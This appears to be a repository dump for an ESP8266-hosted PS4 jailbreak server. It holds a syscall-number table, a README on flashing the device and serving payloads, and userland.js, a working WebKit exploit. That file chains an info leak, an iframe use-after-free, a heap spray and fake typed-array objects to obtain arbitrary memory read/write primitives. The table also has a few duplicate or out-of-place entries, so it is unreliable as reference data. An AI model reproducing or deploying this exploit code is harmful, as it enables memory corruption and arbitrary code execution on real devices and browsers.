101 |   "sys_getpeername": 141,
102 |   "sys_setsid": 147,
103 |   "sys_sysarch": 165,
104 |   "sys_setegid": 182,
105 |   "sys_seteuid": 183,
106 |   "sys_fstat": 189,
107 |   "sys_lstat": 190,
108 |   "sys_pathconf": 191,
109 |   "sys_fpathconf": 192,
110 |   "sys_getrlimit": 194,
111 |   "sys_setrlimit": 195,
112 |   "sys_getdirentries": 196,
113 |   "sys___sysctl": 202,
114 |   "sys_mlock": 203,
115 |   "sys_munlock": 204,
116 |   "sys_futimes": 206,
117 |   "sys_poll": 209,
118 |   "sys_clock_gettime": 232,
119 |   "sys_clock_settime": 233,
120 |   "sys_clock_getres": 234,
121 |   "sys_ktimer_create": 235,
122 |   "sys_ktimer_delete": 236,
123 |   "sys_ktimer_settime": 237,
124 |   "sys_ktimer_gettime": 238,
125 |   "sys_ktimer_getoverrun": 239,
126 |   "sys_nanosleep": 240,
127 |   "sys_rfork": 251,
128 |   "sys_issetugid": 253,
129 |   "sys_getdents": 272,
130 |   "sys_preadv": 289,
131 |   "sys_pwritev": 290,
132 |   "sys_getsid": 310,
133 |   "sys_aio_suspend": 315,
134 |   "sys_mlockall": 324,
135 |   "sys_munlockall": 325,
136 |   "sys_sched_setparam": 327,
137 |   "sys_sched_getparam": 328,
138 |   "sys_sched_setscheduler": 329,
139 |   "sys_sched_getscheduler": 330,
140 |   "sys_sched_yield": 331,
141 |   "sys_sched_get_priority_max": 332,
142 |   "sys_sched_get_priority_min": 333,
143 |   "sys_sched_rr_get_interval": 334,
144 |   "sys_utrace": 335,
145 |   "sys_sigprocmask": 340,
146 |   "sys_sigprocmask": 340,
147 |   "sys_sigsuspend": 341,
148 |   "sys_sigpending": 343,
149 |   "sys_sigtimedwait": 345,
150 |   "sys_sigwaitinfo": 346,
151 |   "sys_kqueue": 362,
152 |   "sys_kevent": 363,
153 |   "sys_uuidgen": 392,
154 |   "sys_sendfile": 393,
155 |   "sys_fstatfs": 397,
156 |   "sys_ksem_close": 400,
157 |   "sys_ksem_post": 401,
158 |   "sys_ksem_wait": 402,
159 |   "sys_ksem_trywait": 403,
160 |   "sys_ksem_init": 404,
161 |   "sys_ksem_open": 405,
162 |   "sys_ksem_unlink": 406,
163 |   "sys_ksem_getvalue": 407,
164 |   "sys_ksem_destroy": 408,
165 |   "sys_sigaction": 416,
166 |   "sys_sigreturn": 417,
167 |   "sys_getcontext": 421,
168 |   "sys_setcontext": 422,
169 |   "sys_swapcontext": 423,
170 |   "sys_sigwait": 429,
171 |   "sys_thr_create": 430,
172 |   "sys_thr_exit": 431,
173 |   "sys_thr_self": 432,
174 |   "sys_thr_kill": 433,
175 |   "sys_ksem_timedwait": 441,
176 |   "sys_thr_suspend": 442,
177 |   "sys_thr_wake": 443,
178 |   "sys_kldunloadf": 444,
179 |   "sys__umtx_op": 454,
180 |   "sys__umtx_op": 454,
181 |   "sys_thr_new": 455,
182 |   "sys_sigqueue": 456,
183 |   "sys_thr_set_name": 464,
184 |   "sys_rtprio_thread": 466,
185 |   "sys_pread": 475,
186 |   "sys_pwrite": 476,
187 |   "sys_mmap": 477,
188 |   "sys_lseek": 478,
189 |   "sys_truncate": 479,
190 |   "sys_ftruncate": 480,
191 |   "sys_thr_kill2": 481,
192 |   "sys_shm_open": 482,
193 |   "sys_shm_unlink": 483,
194 |   "sys_cpuset_getid": 486,
195 |   "sys_cpuset_getaffinity": 487,
196 |   "sys_cpuset_setaffinity": 488,
197 |   "sys_openat": 499,
198 |   "sys_pselect": 522,
199 | 
200 |   "sys_regmgr_call": 532,
201 |   "sys_jitshm_create": 533,
202 |   "sys_jitshm_alias": 534,
203 |   "sys_dl_get_list": 535,
204 |   "sys_dl_get_info": 536,
205 |   "sys_dl_notify_event": 537,
206 |   "sys_evf_create": 538,
207 |   "sys_evf_delete": 539,
208 |   "sys_evf_open": 540,
209 |   "sys_evf_close": 541,
210 |   "sys_evf_wait": 542,
211 |   "sys_evf_trywait": 543,
212 |   "sys_evf_set": 544,
213 |   "sys_evf_clear": 545,
214 |   "sys_evf_cancel": 546,
215 |   "sys_query_memory_protection": 47,
216 |   "sys_batch_map": 548,
217 |   "sys_osem_create": 549,
218 |   "sys_osem_delete": 550,
219 |   "sys_osem_open": 551,
220 |   "sys_osem_close": 552,
221 |   "sys_osem_wait": 553,
222 |   "sys_osem_trywait": 554,
223 |   "sys_osem_post": 555,
224 |   "sys_osem_cancel": 556,
225 |   "sys_namedobj_create": 557,
226 |   "sys_namedobj_delete": 558,
227 |   "sys_set_vm_container": 559,
228 |   "sys_debug_init": 560,
229 |   "sys_suspend_process": 561,
230 |   "sys_resume_process": 562,
231 |   "sys_opmc_enable": 563,
232 |   "sys_opmc_disable": 564,
233 |   "sys_opmc_set_ctl": 565,
234 |   "sys_opmc_set_ctr": 566,
235 |   "sys_opmc_get_ctr": 567,
236 |   "sys_budget_create": 568,
237 |   "sys_budget_delete": 569,
238 |   "sys_budget_get": 570,
239 |   "sys_budget_set": 571,
240 |   "sys_virtual_query": 572,
241 |   "sys_mdbg_call": 573,
242 |   "sys_sblock_create": 574,
243 |   "sys_sblock_delete": 575,
244 |   "sys_sblock_enter": 576,
245 |   "sys_sblock_exit": 577,
246 |   "sys_sblock_xenter": 578,
247 |   "sys_sblock_xexit": 579,
248 |   "sys_eport_create": 580,
249 |   "sys_eport_delete": 581,
250 |   "sys_eport_trigger": 582,
251 |   "sys_eport_open": 583,
252 |   "sys_eport_close": 584,
253 |   "sys_is_in_sandbox": 585,
254 |   "sys_dmem_container": 586,
255 |   "sys_get_authinfo": 587,
256 |   "sys_mname": 588,
257 |   "sys_dynlib_dlopen": 589,
258 |   "sys_dynlib_dlclose": 590,
259 |   "sys_dynlib_dlsym": 591,
260 |   "sys_dynlib_get_list": 592,
261 |   "sys_dynlib_get_info": 593,
262 |   "sys_dynlib_load_prx": 594,
263 |   "sys_dynlib_unload_prx": 595,
264 |   "sys_dynlib_do_copy_relocations": 596,
265 |   "sys_dynlib_prepare_dlclose": 597,
266 |   "sys_dynlib_get_proc_param": 598,
267 |   "sys_dynlib_process_needed_and_relocate": 599,
268 |   "sys_sandbox_path": 600,
269 |   "sys_mdbg_service": 601,
270 |   "sys_randomized_path": 602,
271 |   "sys_rdup": 603,
272 |   "sys_dl_get_metadata": 604,
273 |   "sys_workaround8849": 605,
274 |   "sys_is_development_mode": 606,
275 |   "sys_get_self_auth_info": 607,
276 |   "sys_dynlib_get_info_ex": 608,
277 |   "sys_budget_get_ptype": 610,
278 |   "sys_budget_getid": 609,
279 |   "sys_get_paging_stats_of_all_threads": 611,
280 |   "sys_get_proc_type_info": 612,
281 |   "sys_get_resident_count": 613,
282 |   "sys_prepare_to_suspend_process": 614,
283 |   "sys_get_resident_fmem_count": 615,
284 |   "sys_thr_get_name": 616,
285 |   "sys_set_gpo": 617,
286 |   "sys_thr_suspend_ucontext": 632,
287 |   "sys_thr_resume_ucontext": 633,
288 |   "sys_thr_get_ucontext": 634
289 | }
290 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/userland.js:
--------------------------------------------------------------------------------
  1 | /////////////////// UTILITY STUFF ///////////////////
  2 | 
  3 | function makeid() {
  4 |   var text = "";
  5 |   var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  6 |     
  7 |   for( var i=0; i < 8; i++ )
  8 |   text += possible.charAt(Math.floor(Math.random() * possible.length));
  9 |     
 10 |   return text;
 11 | };
 12 | 
 13 | var instancespr = [];
 14 | 
 15 | for(var i=0; i<2048; i++) {
 16 |   instancespr[i] = {};
 17 |   instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 18 | }
 19 | for(var i=2048; i<4096; i++) {
 20 |   instancespr[i] = new Uint32Array(1);
 21 |   instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 22 | }
 23 | 
 24 | var _dview;
 25 | 
 26 | function u2d(low, hi) {
 27 |   if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 28 |   _dview.setUint32(0, hi);
 29 |   _dview.setUint32(4, low);
 30 |   return _dview.getFloat64(0);
 31 | }
 32 | 
 33 | function int64(low,hi) {
 34 |   this.low = (low>>>0);
 35 |   this.hi = (hi>>>0);
 36 | 
 37 |   this.add32inplace = function(val) {
 38 |     var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 39 |     var new_hi = (this.hi >>> 0);
 40 | 
 41 |     if (new_lo < this.low) {
 42 |       new_hi++;
 43 |     }
 44 | 
 45 |     this.hi=new_hi;
 46 |     this.low=new_lo;
 47 |   }
 48 | 
 49 |   this.add32 = function(val) {
 50 |     var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 51 |     var new_hi = (this.hi >>> 0);
 52 | 
 53 |     if (new_lo < this.low) {
 54 |       new_hi++;
 55 |     }
 56 | 
 57 |     return new int64(new_lo, new_hi);
 58 |   }
 59 | 
 60 |   this.sub32 = function(val) {
 61 |     var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 62 |     var new_hi = (this.hi >>> 0);
 63 | 
 64 |     if (new_lo > (this.low) & 0xFFFFFFFF) {
 65 |       new_hi--;
 66 |     }
 67 | 
 68 |     return new int64(new_lo, new_hi);
 69 |   }
 70 | 
 71 |   this.sub32inplace = function(val) {
 72 |     var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 73 |     var new_hi = (this.hi >>> 0);
 74 | 
 75 |     if (new_lo > (this.low) & 0xFFFFFFFF) {
 76 |       new_hi--;
 77 |     }
 78 | 
 79 |     this.hi=new_hi;
 80 |     this.low=new_lo;
 81 |   }
 82 | 
 83 |   this.and32 = function(val) {
 84 |     var new_lo = this.low & val;
 85 |     var new_hi = this.hi;
 86 |     return new int64(new_lo, new_hi);
 87 |   }
 88 | 
 89 |   this.and64 = function(vallo, valhi) {
 90 |     var new_lo = this.low & vallo;
 91 |     var new_hi = this.hi & valhi;
 92 |     return new int64(new_lo, new_hi);
 93 |   }
 94 | 
 95 |   this.toString = function(val) {
 96 |     val = 16;
 97 |     var lo_str = (this.low >>> 0).toString(val);
 98 |     var hi_str = (this.hi >>> 0).toString(val);
 99 | 
100 |     if(this.hi == 0)
101 |       return lo_str;
102 |     else
103 |       lo_str = zeroFill(lo_str, 8)
104 | 
105 |     return hi_str+lo_str;
106 |   }
107 | 
108 |   this.toPacked = function() {
109 |     return {hi: this.hi, low: this.low};
110 |   }
111 | 
112 |   this.setPacked = function(pck) {
113 |     this.hi=pck.hi;
114 |     this.low=pck.low;
115 |     return this;
116 |   }
117 |     
118 |   return this;
119 | }
120 | 
121 | function zeroFill(number, width ) {
122 |     width -= number.toString().length;
123 | 
124 |     if (width > 0) {
125 |         return new Array(width + (/\./.test( number ) ? 2 : 1)).join('0') + number;
126 |     }
127 | 
128 |     return number + ""; // always return a string
129 | }
130 | 
131 | var nogc = [];
132 | 
133 | /////////////////// STAGE 1: INFOLEAK ///////////////////
134 | 
135 | failed = false
136 | 
137 | // Spray a bunch of JSObjects on the heap for stability
138 | for(var i = 0; i < 0x4000; i++) {
139 |   nogc.push({a: 0, b: 0, c: 0, d: 0});
140 | }
141 | 
142 | // Target JSObject for overlap
143 | var tgt = {a: 0, b: 0, c: 0, d: 0}
144 | 
145 | for(var i = 0; i < 0x400; i++) {
146 |   nogc.push({a: 0, b: 0, c: 0, d: 0});
147 | }
148 | 
149 | var y = new ImageData(1, 0x4000)
150 | postMessage("", "*", [y.data.buffer]);
151 | 
152 | // Spray properties to ensure object is fastmalloc()'d and can be found easily later
153 | var props = {};
154 | 
155 | for(var i = 0; (i < (0x4000 / 2));) {
156 |   props[i++] = {value: 0x42424242};
157 |   props[i++] = {value: tgt};
158 | }
159 | 
160 | // Find address of JSValue by leaking one of the JSObject's we sprayed
161 | var foundLeak   = undefined;
162 | var foundIndex  = 0;
163 | var maxCount    = 0x100;
164 | 
165 | // Only check 256 times, should rarely fail
166 | while(foundLeak == undefined && maxCount > 0) {
167 |   maxCount--;
168 | 
169 |   history.pushState(y, "");
170 | 
171 |   Object.defineProperties({}, props);
172 | 
173 |   var leak = new Uint32Array(history.state.data.buffer);
174 | 
175 |   // Check memory against known values such as 0x42424242 JSValue and empty JSObject values
176 |   for(var i = 0; i < leak.length - 6; i++) {
177 |     if(
178 |       leak[i]       == 0x42424242 &&
179 |       leak[i + 0x1] == 0xFFFF0000 &&
180 |       leak[i + 0x2] == 0x00000000 &&
181 |       leak[i + 0x3] == 0x00000000 &&
182 |       leak[i + 0x4] == 0x00000000 &&
183 |       leak[i + 0x5] == 0x00000000 &&
184 |       leak[i + 0x6] == 0x0000000E &&
185 |       leak[i + 0x7] == 0x00000000 &&
186 |       leak[i + 0xA] == 0x00000000 &&
187 |       leak[i + 0xB] == 0x00000000 &&
188 |       leak[i + 0xC] == 0x00000000 &&
189 |       leak[i + 0xD] == 0x00000000 &&
190 |       leak[i + 0xE] == 0x0000000E &&
191 |       leak[i + 0xF] == 0x00000000
192 |     ) {
193 |       foundIndex = i;
194 |       foundLeak = leak;
195 |       break;
196 |     }
197 |   }
198 | }
199 | 
200 | // Oh no :(
201 | if(!foundLeak) {
202 |   failed = true
203 |   fail("Failed to find leak!")
204 | }
205 | 
206 | // Get first JSValue
207 | var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
208 | var leakJSVal = new int64(firstLeak[8], firstLeak[9]);
209 | leakJSVal.toString();
210 | 
211 | // Spray and clear 
212 | for(var i = 0; i < 0x4000; i++) {
213 |   var lol = {a: 0, b: 0, c: 0, d: 0};
214 | }
215 | 
216 | // Force garbage collection via memory pressure
217 | var dgc = function() {
218 |   for (var i = 0; i < 0x100; i++) {
219 |     new ArrayBuffer(0x100000);
220 |   }
221 | }
222 | 
223 | /////////////////// STAGE 2: UAF ///////////////////
224 | 
225 | // Userland pwnage
226 | function exploit() {
227 |   if(failed) {
228 |     return;
229 |   }
230 | 
231 |   try {
232 |     var src = document.createAttribute('src');
233 |     src.value = 'javascript:parent.callback()';
234 |       
235 |     var d = document.createElement('div');
236 | 
237 |     // Sandwich our target iframe
238 |     for(var i = 0; i < 0x4000; i++) {
239 |       nogc.push(document.createElement('iframe'));
240 |     }
241 | 
242 |     var f = document.body.appendChild(document.createElement('iframe'));
243 | 
244 |     for(var i = 0; i < 0x4000; i++) {
245 |       nogc.push(document.createElement('iframe'));
246 |     }
247 | 
248 |     // Free the iframe!
249 |     window.callback = () => {
250 |       window.callback = null;
251 |       
252 |       d.setAttributeNodeNS(src);
253 |       f.setAttributeNodeNS(document.createAttribute('src'));
254 |     };
255 | 
256 |     f.name = "lol";
257 |     f.setAttributeNodeNS(src);
258 |     f.remove();
259 |     
260 |     f = null;
261 |     src = null;
262 |     nogc.length=0;
263 |     dgc();
264 | 
265 |     /////////////////// STAGE 3: HEAP SPRAY ///////////////////
266 | 
267 |     // Setup spray variables
268 |     var objSpray  = 0x10000;
269 |     var objSz     = 0x90;
270 |     var objs      = new Array(objSpray);
271 | 
272 |     // Spray the heap with MarkedArgumentBuffers to corrupt iframe JSObject's backing memory. ImageData does this well.
273 |     for(var i = 0; i < objSpray; i++) {
274 |       objs[i] = new ImageData(1, objSz / 4);
275 |     }
276 | 
277 |     for(var i = 0; i < objSpray; i++) {
278 |       objs[i] = new Uint32Array(objs[i].data.buffer);
279 |     }
280 | 
281 |     /////////////////// STAGE 4: MISALIGNING JSVALUES ///////////////////
282 | 
283 |     var craftptr = leakJSVal.sub32(0x10000 - 0x10)
284 |     tgt.b = u2d(0,craftptr.low); // 0x10000 is offset due to double encoding
285 |     tgt.c = craftptr.hi;
286 |     tgt.a = u2d(2048, 0x1602300);
287 | 
288 |     /////////////////// STAGE 3 - CONTINUED ///////////////////
289 | 
290 |     // Memory corruption ; not even once!
291 |     for (var i=0; i<objSpray; i++)
292 |     {
293 |       // The poor butterflies :(
294 |       objs[i][2] = leakJSVal.low + 0x18 + 4;
295 |       objs[i][3] = leakJSVal.hi;
296 |     }
297 | 
298 |     /////////////////// STAGE 5: READ/WRITE PRIMITIVE ///////////////////
299 | 
300 |     // Retrieve stale reference and setup primitive helpers
301 |     var stale   = d.attributes[0].ownerElement;
302 |     var master  = new Uint32Array(0x1000);
303 |     var slave   = new Uint32Array(0x1000);
304 |     var leakval_u32     = new Uint32Array(0x1000);
305 |     var leakval_helper  = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
306 | 
307 |     // Create fake ArrayBufferView
308 |     tgt.a = u2d(4096, 0x1602300);
309 |     tgt.b = 0;
310 |     tgt.c = leakval_helper;
311 |     tgt.d = 0x1337;
312 | 
313 |     // Save old butterfly
314 |     var butterfly = new int64(stale[2], stale[3]);
315 | 
316 |     // Set leakval_u32's vector to leakval_helper's butterfly
317 |     tgt.c = leakval_u32;
318 |     var lkv_u32_old = new int64(stale[4], stale[5]);
319 |     
320 |     stale[4] = butterfly.low;
321 |     stale[5] = butterfly.hi;
322 | 
323 |     // Setup read/write primitive
324 |     tgt.c = master;
325 |     stale[4] = leakval_u32[0];
326 |     stale[5] = leakval_u32[1];
327 |     
328 |     var addr_to_slavebuf = new int64(master[4], master[5]);
329 |     tgt.c = leakval_u32;
330 |     stale[4] = lkv_u32_old.low;
331 |     stale[5] = lkv_u32_old.hi;
332 | 
333 |     // Restore proper JSValues
334 |     for (var i=0; i<objSpray; i++)
335 |     {
336 |       objs[i][2] = 0x41414141;
337 |       objs[i][3] = 0xFFFF0000;
338 |     }
339 | 
340 |     // Don't need these anymore
341 |     tgt.c = 0;
342 |     stale = 0;
343 | 
344 |     // Primitives :D
345 |     var prim = {
346 |       write8: function(addr, val) {
347 |         master[4] = addr.low;
348 |         master[5] = addr.hi;
349 | 
350 |         if (val instanceof int64) {
351 |           slave[0] = val.low;
352 |           slave[1] = val.hi;
353 |         } else {
354 |           slave[0] = val;
355 |           slave[1] = 0;
356 |         }
357 | 
358 |         master[4] = addr_to_slavebuf.low;
359 |         master[5] = addr_to_slavebuf.hi;
360 |       },
361 | 
362 |       write4: function(addr, val) {
363 |         master[4] = addr.low;
364 |         master[5] = addr.hi;
365 | 
366 |         slave[0] = val;
367 | 
368 |         master[4] = addr_to_slavebuf.low;
369 |         master[5] = addr_to_slavebuf.hi;
370 |       },
371 | 
372 |       read8: function(addr) {
373 |         master[4] = addr.low;
374 |         master[5] = addr.hi;
375 | 
376 |         var rtv = new int64(slave[0], slave[1]);
377 | 
378 |         master[4] = addr_to_slavebuf.low;
379 |         master[5] = addr_to_slavebuf.hi;
380 | 
381 |         return rtv;
382 |       },
383 | 
384 |       read4: function(addr)
385 |       {
386 |         master[4] = addr.low;
387 |         master[5] = addr.hi;
388 | 
389 |         var rtv = slave[0];
390 | 
391 |         master[4] = addr_to_slavebuf.low;
392 |         master[5] = addr_to_slavebuf.hi;
393 | 
394 |         return rtv;
395 |       },
396 | 
397 |       leakval: function(jsval)
398 |       {
399 |         leakval_helper[0] = jsval;
400 |         var rtv = this.read8(butterfly);
401 |         this.write8(butterfly, new int64(0x41414141, 0xffffffff));
402 |           
403 |         return rtv;
404 |       },
405 | 
406 |       createval: function(jsval)
407 |       {
408 |         this.write8(butterfly, jsval);
409 |         var rt = leakval_helper[0];
410 |         this.write8(butterfly, new int64(0x41414141, 0xffffffff));
411 |         return rt;
412 |       }
413 |     };
414 | 
415 |     window.primitives = prim;
416 | 
417 |     postExploit();
418 |   } catch(e) {
419 |     failed = true
420 |     fail("Exception: " + e)
421 |   }
422 | 
423 |   /*setTimeout(function() {
424 |     sc = document.createElement("script");
425 |     sc.src="kernel.js";
426 |     document.body.appendChild(sc);
427 |   }, 100);*/
428 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | My fork of treyjazz/ESPS4ExploitServer to serve the 4.55 exploit files to ps4
 2 | 
 3 | Firstly a few requisites
 4 | 
 5 | The ESP Filesystem Uploader will need to be installed to tranfer contents to SPIFFS :
 6 | 
 7 |  http://www.instructables.com/id/Using-ESP8266-SPIFFS/
 8 | 
 9 | Install nailbusters ESP8266FTP library from here:
10 | 
11 | https://github.com/nailbuster/esp8266FTPServer
12 | 
13 | Upload sketch and SPIFFS using the arduino ide. Default settings will start a WiFi Acess Point named PS4Exploit, password : hackmyps4
14 | An FTP server will be running at the IP address on the /index.html page. User : ESPS4 Password : password.
15 | FTP connection needs to be passive, maximum 1 connection and and encryption disabled. This will allow easier access to files stored in SPIFFS to edit or add new payloads.
16 | 
17 | 
18 | definitely a few bugs in there, webserver will ocasionally crash and require a hard reset.
19 | 
20 | 
21 | None of this is my original work, all credits to the original creators. I originally edited this project to work with firmware 4.55. I may keep this project up to date, depending on interest.
22 | 
23 | For those struggling to make this work first make sure the data folder has been uploaded to spiffs (it cant serve the webpage if it isnt there), or copied over using the inbuilt ftp server. 
24 | on the PS4 side i usually use custom wifi settings if accesing the esp as an access point. 
25 | ip 10.13.37.9
26 | gateway 10.13.37.1
27 | dns 10.13.37.1
28 | 


--------------------------------------------------------------------------------